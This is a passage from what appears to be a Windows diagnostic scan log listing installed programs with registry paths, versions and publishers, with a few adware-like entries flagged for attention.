Adobe Premiere Elements 7.0 Templates (HKLM-x32\...\PremElem70Templates) (Version: 7.0.1 - Adobe Systems Incorporated)
Adobe Premiere Elements 7.0 Templates (x32 Version: 7.0.1 - Adobe Systems Incorporated) Hidden
Adobe Reader X (10.1.11) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.11 - Adobe Systems Incorporated)
Apple Application Support (HKLM-x32\...\{78002155-F025-4070-85B3-7C0453561701}) (Version: 3.0.6 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{B678797F-DF38-4556-8A31-8B818E261868}) (Version: 8.0.0.23 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version:  - )
ATI Catalyst Install Manager (HKLM\...\{38256203-7268-615D-9587-F12B473BC9B6}) (Version: 3.0.710.0 - ATI Technologies, Inc.)
AVG SafeGuard toolbar (HKLM-x32\...\AVG SafeGuard toolbar) (Version: 18.1.9.799 - AVG Technologies)
BabylonObjectInstaller (HKLM-x32\...\{83AA2913-C123-4146-85BD-AD8F93971D39}) (Version: 2.0.0.3 - Babylon Ltd) <==== ATTENTION
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
bpd_scan (x32 Version: 3.00.0000 - Hewlett-Packard) Hidden
BPDSoftware (x32 Version: 50.0.165.000 - Hewlett-Packard) Hidden
BPDSoftware_Ini (x32 Version: 1.00.0000 - Hewlett-Packard) Hidden
BufferChm (x32 Version: 120.0.194.000 - Hewlett-Packard) Hidden
Catalyst Control Center - Branding (x32 Version: 1.00.0000 - ATI) Hidden
Catalyst Control Center Core Implementation (x32 Version: 2009.0428.2148.37311 - ATI) Hidden
Catalyst Control Center Graphics Full Existing (x32 Version: 2009.0428.2148.37311 - ATI) Hidden
Catalyst Control Center Graphics Full New (x32 Version: 2009.0428.2148.37311 - ATI) Hidden
Catalyst Control Center Graphics Light (x32 Version: 2009.0428.2148.37311 - ATI) Hidden
Catalyst Control Center Graphics Previews Common (x32 Version: 2009.0428.2148.37311 - ATI) Hidden
Catalyst Control Center Graphics Previews Vista (x32 Version: 2009.0428.2148.37311 - ATI) Hidden
Catalyst Control Center InstallProxy (x32 Version: 2009.0428.2148.37311 - ATI Technologies, Inc.) Hidden
Catalyst Control Center Localization All (x32 Version: 2009.0428.2148.37311 - ATI) Hidden
CCC Help Chinese Standard (x32 Version: 2009.0428.2147.37311 - ATI) Hidden
CCC Help Chinese Traditional (x32 Version: 2009.0428.2147.37311 - ATI) Hidden
CCC Help Czech (x32 Version: 2009.0428.2147.37311 - ATI) Hidden
CCC Help Danish (x32 Version: 2009.0428.2147.37311 - ATI) Hidden
CCC Help Dutch (x32 Version: 2009.0428.2147.37311 - ATI) Hidden
CCC Help English (x32 Version: 2009.0428.2147.37311 - ATI) Hidden
CCC Help Finnish (x32 Version: 2009.0428.2147.37311 - ATI) Hidden
CCC Help French (x32 Version: 2009.0428.2147.37311 - ATI) Hidden
CCC Help German (x32 Version: 2009.0428.2147.37311 - ATI) Hidden
CCC Help Greek (x32 Version: 2009.0428.2147.37311 - ATI) Hidden
CCC Help Hungarian (x32 Version: 2009.0428.2147.37311 - ATI) Hidden
CCC Help Italian (x32 Version: 2009.0428.2147.37311 - ATI) Hidden
CCC Help Japanese (x32 Version: 2009.0428.2147.37311 - ATI) Hidden
CCC Help Korean (x32 Version: 2009.0428.2147.37311 - ATI) Hidden
CCC Help Norwegian (x32 Version: 2009.0428.2147.37311 - ATI) Hidden
CCC Help Polish (x32 Version: 2009.0428.2147.37311 - ATI) Hidden
CCC Help Portuguese (x32 Version: 2009.0428.2147.37311 - ATI) Hidden
CCC Help Russian (x32 Version: 2009.0428.2147.37311 - ATI) Hidden
CCC Help Spanish (x32 Version: 2009.0428.2147.37311 - ATI) Hidden
CCC Help Swedish (x32 Version: 2009.0428.2147.37311 - ATI) Hidden
CCC Help Thai (x32 Version: 2009.0428.2147.37311 - ATI) Hidden
CCC Help Turkish (x32 Version: 2009.0428.2147.37311 - ATI) Hidden
ccc-core-static (x32 Version: 2009.0428.2148.37311 - ATI) Hidden
ccc-utility64 (Version: 2009.0428.2148.37311 - ATI) Hidden
CyberLink DVD Suite Deluxe (HKLM-x32\...\InstallShield_{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}) (Version: 6.0.2602 - CyberLink Corp.)
CyberLink DVD Suite Deluxe (x32 Version: 6.0.2602 - CyberLink Corp.) Hidden
CyberLink YouCam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 2.0.3003 - CyberLink Corp.)
CyberLink YouCam (x32 Version: 2.0.3003 - CyberLink Corp.) Hidden
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Default Manager (x32 Version: 1.0.105.0 - Microsoft Corporation) Hidden
Destination Component (x32 Version: 110.0.0.0 - Hewlett-Packard) Hidden
DeviceDiscovery (x32 Version: 120.0.194.000 - Hewlett-Packard) Hidden
DirectX for Managed Code Update (Summer 2004) (x32 Version: 9.02.2904 - Microsoft) Hidden
DocMgr (x32 Version: 120.0.000.000 - Hewlett-Packard) Hidden
DocProc (x32 Version: 12.0.0.0 - Hewlett-Packard) Hidden
Driver Detective (HKLM-x32\...\{4640FDE1-B83A-4376-84ED-86F86BEE2D41}) (Version: 8.0.0 - PC Drivers HeadQuarters)
Facebook Video Calling 3.1.0.521 (HKLM-x32\...\{2091F234-EB58-4B80-8C96-8EB78C808CF7}) (Version: 3.1.521 - Skype Limited)
Fax (x32 Version: 120.0.194.000 - Hewlett-Packard) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 37.0.2062.120 - Google Inc.)
Google Earth (HKLM-x32\...\{4D2A6330-2F8B-11E3-9C40-B8AC6F97B88E}) (Version: 7.1.2.2041 - Google)
Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.5111.1712 - Google Inc.)
Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.24.15 - Google Inc.) Hidden
Google Updater (HKLM-x32\...\Google Updater) (Version: 2.4.1636.7222 - Google Inc.)
GPBaseService2 (x32 Version: 120.0.194.000 - Hewlett-Packard) Hidden
Hardware Diagnostic Tools (HKLM\...\PC-Doctor for Windows) (Version: 5.1.5144.16 - PC-Doctor, Inc.)
HP Active Support Library (HKLM-x32\...\{0295F89F-F698-4101-9A7D-49F407EC2D82}) (Version: 3.1.10.1 - Hewlett-Packard)
HP Advisor (HKLM-x32\...\{73A43E42-3658-4DD9-8551-FACDA3632538}) (Version: 3.1.9152.3107 - Hewlett-Packard)
HP Customer Experience Enhancements (HKLM-x32\...\{B84739A3-F943-47E4-95D8-96381EF5AC48}) (Version: 5.7.0.2945 - Hewlett-Packard)
HP Customer Participation Program 12.0 (HKLM\...\HPExtendedCapabilities) (Version: 12.0 - HP)
HP Document Manager 2.0 (HKLM\...\HP Document Manager) (Version: 2.0 - HP)
HP Easy Backup (HKLM-x32\...\{67431FA8-4B89-42DD-A68E-30D77F6C8D99}_is1) (Version: 1.0.7.1 - Hewlett-Packard)
HP Games (HKLM-x32\...\WildTangent hp Master Uninstall) (Version: 1.0.0.66 - WildTangent)
HP Imaging Device Functions 12.0 (HKLM\...\HP Imaging Device Functions) (Version: 12.0 - HP)
HP MediaSmart Demo (HKLM-x32\...\{290CA856-3737-4874-864B-BA142F4823C8}_is1) (Version: 1.0.0.0 - Hewlett-Packard Company)
HP MediaSmart DVD (HKLM-x32\...\InstallShield_{DCCAD079-F92C-44DA-B258-624FC6517A5A}) (Version: 2.2.2719 - Hewlett-Packard)
HP MediaSmart DVD (x32 Version: 2.2.2719 - Hewlett-Packard) Hidden
HP MediaSmart Music/Photo/Video (HKLM-x32\...\InstallShield_{B2EE25B9-5B00-4ACF-94F0-92433C28C39E}) (Version: 2.2.2809 - Hewlett-Packard)
HP MediaSmart Music/Photo/Video (x32 Version: 2.2.2809 - Hewlett-Packard) Hidden
HP MediaSmart SmartMenu (HKLM\...\{D2E8F543-D23A-4A38-AFFC-4BDEBFBA6FDA}) (Version: 2.1.12 - Hewlett-Packard)
HP My Display (HKLM-x32\...\{15733AD1-1CEF-459A-9245-0924FC63BDD5}) (Version: 1.35.003 - Portrait Displays, Inc.)
HP Odometer (HKLM-x32\...\{B8AC1A89-FFD1-4F97-8051-E505A160F562}) (Version: 2.10.0000 - Hewlett-Packard)
HP Officejet 6500 E709 Series (HKLM\...\{FA0F0A01-4631-4161-A6C2-948BF694382E}) (Version: 12.0 - HP)
HP Picasso Media Center Add-In (x32 Version: 1.0.0 - HP) Hidden
HP Product Detection (HKLM-x32\...\{CAE7D1D9-3794-4169-B4DD-964ADBC534EE}) (Version: 9.7.2 - Hewlett-Packard Company)
HP Recovery Manager RSS (x32 Version: 92.0.0.11 - Hewlet Packard Company) Hidden
HP Remote Software (HKLM\...\{5F240DB8-0D74-4F13-86C3-929760392A8D}) (Version: 1.0.5.0 - Hewlett-Packard)
HP Smart Web Printing (HKLM\...\HP Smart Web Printing) (Version: 4.05 - HP)
HP Solution Center 12.0 (HKLM\...\HP Solution Center & Imaging Support Tools) (Version: 12.0 - HP)
HP Support Information (HKLM-x32\...\{1CC069FA-1A86-402E-9787-3F04E652C67A}) (Version: 10.1.0001 - Hewlett-Packard)
HP Total Care Setup (HKLM-x32\...\{784BEA84-FA66-4B19-BB80-7B545F248AC6}) (Version: 1.2.2854.2975 - Hewlett-Packard)
HP Update (HKLM-x32\...\{818ABC3C-635C-4651-8183-D0E9640B7DD1}) (Version: 5.002.001.004 - Hewlett-Packard)
HPAsset component for HP Active Support Library (x32 Version: 3.0.0.3 - Hewlett-Packard) Hidden
HPProductAssistant (x32 Version: 120.0.194.000 - Hewlett-Packard) Hidden
HPSSupply (x32 Version: 120.0.194.000 - Hewlett-Packard) Hidden
IBM Lotus Forms Viewer 3.5.1 (HKLM-x32\...\{A0BBF7AB-2F47-47DC-BB02-4C826F2BC73C}) (Version: 7.6.1.123 - IBM)
iLivid (HKLM-x32\...\iLivid) (Version: 4.0.0.2208 - Bandoo Media Inc) <==== ATTENTION
Intel® Matrix Storage Manager (HKLM\...\{9068B2BE-D93A-4C0A-861C-5E35E2C0E09E}) (Version:  - Intel Corporation)
InterActual Player (HKLM-x32\...\InterActual Player) (Version:  - )
IObit Malware Fighter (HKLM-x32\...\IObit Malware Fighter_is1) (Version: 2.0 - IObit)
iTunes (HKLM\...\{F46AA0F1-E284-4878-A462-5F11B9166C0E}) (Version: 11.4.0.18 - Apple Inc.)
Java Auto Updater (x32 Version: 2.0.7.2 - Sun Microsystems, Inc.) Hidden
Java™ 6 Update 38 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83216032FF}) (Version: 6.0.380 - Oracle)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
K-Lite Codec Pack 6.5.0 (Full) (HKLM-x32\...\KLiteCodecPack_is1) (Version: 6.5.0 - )
LabelPrint (HKLM-x32\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.1402 - CyberLink Corp.)
LabelPrint (x32 Version: 2.5.1402 - CyberLink Corp.) Hidden
LightScribe System Software (HKLM-x32\...\{7F10292C-A190-4176-A665-A1ED3478DF86}) (Version: 1.18.3.2 - LightScribe)
Logbook Pro (HKLM-x32\...\{13EAF284-B77A-42FD-A726-56A5982E00A9}) (Version: 1.169.0000 - NC Software, Inc.)
Magic DVD Copier Version 5.0.0 (HKLM-x32\...\Magic DVD Copier_is1) (Version:  - Magic DVD Software, Inc.)
Malwarebytes Anti-Malware version 2.0.2.1012 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.2.1012 - Malwarebytes Corporation)
MarketResearch (x32 Version: 120.0.226.000 - Hewlett-Packard) Hidden
McAfee Security Scan Plus (HKLM\...\McAfee Security Scan) (Version: 3.8.141.11 - McAfee, Inc.)
McAfee Security Scan Plus (HKLM-x32\...\McAfee Security Scan) (Version: 3.0.285.6 - McAfee, Inc.)
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Messenger Companion (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version:  - Microsoft Corporation)
Microsoft .NET Framework 3.5 SP1 (Version: 3.5.30729 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (Version: 4.5.50938 - Microsoft Corporation) Hidden
Microsoft Application Error Reporting (Version: 12.0.6015.5000 - Microsoft Corporation) Hidden
Microsoft Live Search Toolbar (HKLM-x32\...\{DF802C05-4660-418c-970C-B988ADB1D316}) (Version: 3.0.552.0 - Microsoft Live Search Toolbar)
Microsoft Live Search Toolbar (x32 Version: 3.0.552.0 - Microsoft Corporation) Hidden
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\...\{91120000-0030-0000-0000-0000000FF1CE}_ENTERPRISER_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office 2007 Service Pack 3 (SP3) (x32 Version:  - Microsoft) Hidden
Microsoft Office Access MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Access Setup Metadata MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISER) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Enterprise 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Excel MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Groove MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Groove Setup Metadata MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office InfoPath MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Office 64-bit Components 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office OneNote MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Outlook Connector (HKLM-x32\...\{95140000-007A-0409-0000-0000000FF1CE}) (Version: 14.0.5118.5000 - Microsoft Corporation)
Microsoft Office Outlook MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (French) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (Spanish) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proofing (English) 2007 (x32 Version: 12.0.4518.1014 - Microsoft Corporation) Hidden
Microsoft Office Proofing Tools 2007 Service Pack 3 (SP3) (x32 Version:  - Microsoft) Hidden
Microsoft Office Publisher MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared 64-bit MUI (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared Setup Metadata MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Word MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Silverlight (HKLM-x32\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x64 8.0.50727.4053 (HKLM\...\{B6E3757B-5E77-3915-866A-CCFC4B8D194C}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) - KB2467175 (HKLM\...\{aac9fcc4-dd9e-4add-901c-b5496a07ab2e}) (Version: 8.0.51011 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6E8E85E8-CE4B-4FF5-91F7-04999C9FAE6A}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 ATL Update kb973924 - x64 9.0.30729.4148 (HKLM\...\{EE936C7A-EA40-31D5-9B65-8E3E089C3828}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x64 9.0.30729.5570 (HKLM\...\{8338783A-0968-3B85-AFC7-BAAE0A63DC50}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM-x32\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729 (HKLM\...\{4FFA2088-8317-3B14-93CD-4C699DB37843}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Works (HKLM-x32\...\{15BC8CD0-A65B-47D0-A2DD-90A824590FA8}) (Version: 9.7.0621 - Microsoft Corporation)
MobileMe Control Panel (HKLM\...\{591362D4-590B-457E-9BA3-F4D9508B88BA}) (Version: 3.0.0.101 - Apple Inc.)
Move Networks Media Player for Internet Explorer (HKCU\...\Move Networks Player - IE) (Version:  - )
MSVCRT (x32 Version: 15.4.2862.0708 - Microsoft) Hidden
MSVCRT_amd64 (x32 Version: 15.4.2862.0708 - Microsoft) Hidden
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation)
Network64 (Version: 120.0.194.000 - Hewlett-Packard) Hidden
Norton Internet Security (HKLM-x32\...\NIS) (Version: 20.5.0.28 - Symantec Corporation)
Norton Security Scan (HKLM-x32\...\NSS) (Version: 4.1.0.28 - Symantec Corporation)
OCR Software by I.R.I.S. 12.0 (HKLM\...\HPOCR) (Version: 12.0 - HP)
ParetoLogic Privacy Controls (HKLM-x32\...\{29ACDA07-0CAD-4751-B3A4-3E03C5F74673}) (Version: 3.2.0.0 - ParetoLogic, Inc.)
PC Helper 360 (HKLM-x32\...\{CED0FE94-7795-42b5-978C-B247EB3EDE66}) (Version: 3.1.1.0 - Foresight Software)
PictureMover (HKLM-x32\...\{1896E712-2B3D-45eb-BCE9-542742A51032}) (Version: 3.3.1.12 - Hewlett-Packard Company)
Pivot Software (x32 Version: 9.05.014 - Portrait Displays, Inc.) Hidden
Power2Go (HKLM-x32\...\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 6.0.2602 - CyberLink Corp.)
Power2Go (x32 Version: 6.0.2602 - CyberLink Corp.) Hidden
PowerDirector (HKLM-x32\...\InstallShield_{CB099890-1D5F-11D5-9EA9-0050BAE317E1}) (Version: 7.0.2611 - CyberLink Corp.)
PowerDirector (x32 Version: 7.0.2611 - CyberLink Corp.) Hidden
ProductContext (x32 Version: 50.0.165.000 - Hewlett-Packard) Hidden
Python 2.6 pywin32-212 (HKLM-x32\...\pywin32-py2.6) (Version: 2.12 - Python Software Foundation)
Python 2.6.1 (HKLM-x32\...\{9CC89170-000B-457D-91F1-53691F85B223}) (Version: 2.6.1150 - Python Software Foundation)
QuickTime 7 (HKLM-x32\...\{111EE7DF-FC45-40C7-98A7-753AC46B12FB}) (Version: 7.75.80.95 - Apple Inc.)
RealDownloader (x32 Version: 1.3.3 - RealNetworks, Inc.) Hidden
RealNetworks - Microsoft Visual C++ 2008 Runtime (x32 Version: 9.0 - RealNetworks, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (x32 Version: 10.0 - RealNetworks, Inc) Hidden
RealPlayer (HKLM-x32\...\RealPlayer 16.0) (Version: 16.0.3 - RealNetworks)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5789 - Realtek Semiconductor Corp.)
RealUpgrade 1.1 (x32 Version: 1.1.0 - RealNetworks, Inc.) Hidden
Renee Undeleter 2013.10.21.0 (HKLM-x32\...\{BECFEA3A-6E81-436B-9D2B-6B01185004A5}}_is1) (Version: 2013.10.21.0 - Rene.E Laboratory)
Scan (x32 Version: 12.0.0.0 - Hewlett-Packard) Hidden
SDK (x32 Version: 2.15.022 - Portrait Displays, Inc.) Hidden
Segoe UI (x32 Version: 15.4.2271.0615 - Microsoft Corp) Hidden
Shop for HP Supplies (HKLM\...\Shop for HP Supplies) (Version: 12 - HP)
Skins (x32 Version: 2009.0428.2148.37311 - ATI) Hidden
SmartSound Quicktracks for Premiere Elements (HKLM-x32\...\InstallShield_{F6234880-85BE-4DCB-8A45-1FF85A1A8552}) (Version: 3.11.3090 - SmartSound Software Inc)
SmartSound Quicktracks for Premiere Elements (x32 Version: 3.11.3090 - SmartSound Software Inc) Hidden
SmartWebPrinting (x32 Version: 120.0.194.000 - Hewlett-Packard) Hidden
SolutionCenter (x32 Version: 120.0.194.000 - Hewlett-Packard) Hidden
Spinco Download Manager (HKLM-x32\...\{704C2901-0E9C-4E4B-862B-2001DACA314B}) (Version: 1.0.0 - Spinco)
Status (x32 Version: 120.0.194.000 - Hewlett-Packard) Hidden
Toolbox (x32 Version: 120.0.194.000 - Hewlett-Packard) Hidden
Torch (HKCU\...\Torch) (Version: 2.0.0.1705 - Torch Media Inc.) <==== ATTENTION
TrayApp (x32 Version: 120.0.194.000 - Hewlett-Packard) Hidden
UnloadSupport (x32 Version: 11.0.0 - Hewlett-Packard) Hidden
Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{91120000-0030-0000-0000-0000000FF1CE}_ENTERPRISER_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Update for Microsoft .NET Framework 3.5 SP1 (KB963707) (HKLM-x32\...\{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}.KB963707) (Version: 1 - Microsoft Corporation)
Update for Microsoft Office 2007 Help for Common Features (KB963673) (HKLM-x32\...\{90120000-006E-0409-0000-0000000FF1CE}_ENTERPRISER_{AB365889-0395-4FAD-B702-CA5985D53D42}) (Version:  - Microsoft)
Update for Microsoft Office 2007 suites (KB2767916) 32-Bit Edition (HKLM-x32\...\{91120000-0030-0000-0000-0000000FF1CE}_ENTERPRISER_{E9A82945-BA29-4EE8-8F2A-2F49545E9CF2}) (Version:  - Microsoft)
Update for Microsoft Office Access 2007 Help (KB963663) (HKLM-x32\...\{90120000-0015-0409-0000-0000000FF1CE}_ENTERPRISER_{6B76A18A-AA1E-42AB-A7AD-6C84BBB43987}) (Version:  - Microsoft)
Update for Microsoft Office Excel 2007 Help (KB963678) (HKLM-x32\...\{90120000-0016-0409-0000-0000000FF1CE}_ENTERPRISER_{199DF7B6-169C-448C-B511-1054101BE9C9}) (Version:  - Microsoft)
Update for Microsoft Office Infopath 2007 Help (KB963662) (HKLM-x32\...\{90120000-0044-0409-0000-0000000FF1CE}_ENTERPRISER_{716B81B8-B13C-41DF-8EAC-7A2F656CAB63}) (Version:  - Microsoft)
Update for Microsoft Office OneNote 2007 Help (KB963670) (HKLM-x32\...\{90120000-00A1-0409-0000-0000000FF1CE}_ENTERPRISER_{2744EF05-38E1-4D5D-B333-E021EDAEA245}) (Version:  - Microsoft)
Update for Microsoft Office Outlook 2007 (KB2687404) 32-Bit Edition (HKLM-x32\...\{90120000-001A-0409-0000-0000000FF1CE}_ENTERPRISER_{ED38F8A3-4F61-494E-8BCA-E3AC7760C924}) (Version:  - Microsoft)
Update for Microsoft Office Outlook 2007 (KB2863811) 32-Bit Edition (HKLM-x32\...\{91120000-0030-0000-0000-0000000FF1CE}_ENTERPRISER_{53DEC068-4690-4F6B-9946-7D21EF02236B}) (Version:  - Microsoft)
Update for Microsoft Office Outlook 2007 Help (KB963677) (HKLM-x32\...\{90120000-001A-0409-0000-0000000FF1CE}_ENTERPRISER_{0451F231-E3E3-4943-AB9F-58EB96171784}) (Version:  - Microsoft)
Update for Microsoft Office Outlook 2007 Junk Email Filter (KB2825642) 32-Bit Edition (HKLM-x32\...\{91120000-0030-0000-0000-0000000FF1CE}_ENTERPRISER_{9492511E-2CE0-4904-9400-203F44E1DC0D}) (Version:  - Microsoft)
Update for Microsoft Office Powerpoint 2007 Help (KB963669) (HKLM-x32\...\{90120000-0018-0409-0000-0000000FF1CE}_ENTERPRISER_{397B1D4F-ED7B-4ACA-A637-43B670843876}) (Version:  - Microsoft)
Update for Microsoft Office Publisher 2007 Help (KB963667) (HKLM-x32\...\{90120000-0019-0409-0000-0000000FF1CE}_ENTERPRISER_{2E40DE55-B289-4C8B-8901-5D369B16814F}) (Version:  - Microsoft)
Update for Microsoft Office Script Editor Help (KB963671) (HKLM-x32\...\{90120000-006E-0409-0000-0000000FF1CE}_ENTERPRISER_{CD11C6A2-FFC6-4271-8EAB-79C3582F505C}) (Version:  - Microsoft)
Update for Microsoft Office Word 2007 Help (KB963665) (HKLM-x32\...\{90120000-001B-0409-0000-0000000FF1CE}_ENTERPRISER_{80E762AA-C921-4839-9D7D-DB62A72C0726}) (Version:  - Microsoft)
VD64Inst (Version: 1.00.0000 - Roxio, Inc.) Hidden
Viewer_armyifx (HKLM-x32\...\Viewer_armyifx) (Version: 3.5.1 - )
WebReg (x32 Version: 120.0.194.000 - Hewlett-Packard) Hidden
Windows 7 Upgrade Advisor (HKLM-x32\...\{AB05F2C8-F608-403b-95E1-FD8ADFACD31E}) (Version: 2.0.5000.0 - Microsoft Corporation)
Windows Live Communications Platform (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3502.0922 - Microsoft Corporation)
Windows Live Essentials (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Family Safety (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live ID Sign-in Assistant (Version: 7.250.4225.0 - Microsoft Corporation) Hidden
Windows Live Installer (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Language Selector (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Mail (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Mesh (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)
Windows Live Messenger (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Messenger Companion Core (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live MIME IFilter (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Movie Maker (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
